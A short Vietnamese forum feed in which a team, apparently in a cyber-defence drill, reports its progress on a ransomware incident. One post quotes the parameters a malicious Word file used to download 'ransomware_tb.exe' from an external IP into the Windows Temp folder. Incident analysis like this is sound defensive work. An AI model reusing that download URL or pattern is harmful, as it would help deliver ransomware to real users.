Recent Content by Drill_TTTTBacNinh

Drill_TTTTBacNinh báo cáo phase 2 Đã cô lập In và cho phép remote qua port 3889 Phân tích khi click vào file word phát hiện link đến đường dẫn sau chứa virus tải về ổ C SourceName = "http://118.70.80.143:4448/ransomware_tb.exe" Destination = "C:\Windows\Temp\ransomware.exe"

Bắc Ninh báo đã làm xong phase 1, Hiện đã phát hiện máy nhiễm virus, các file đã bị mã hóa không mở được.

Bắc Ninh chưa vào được mod ơi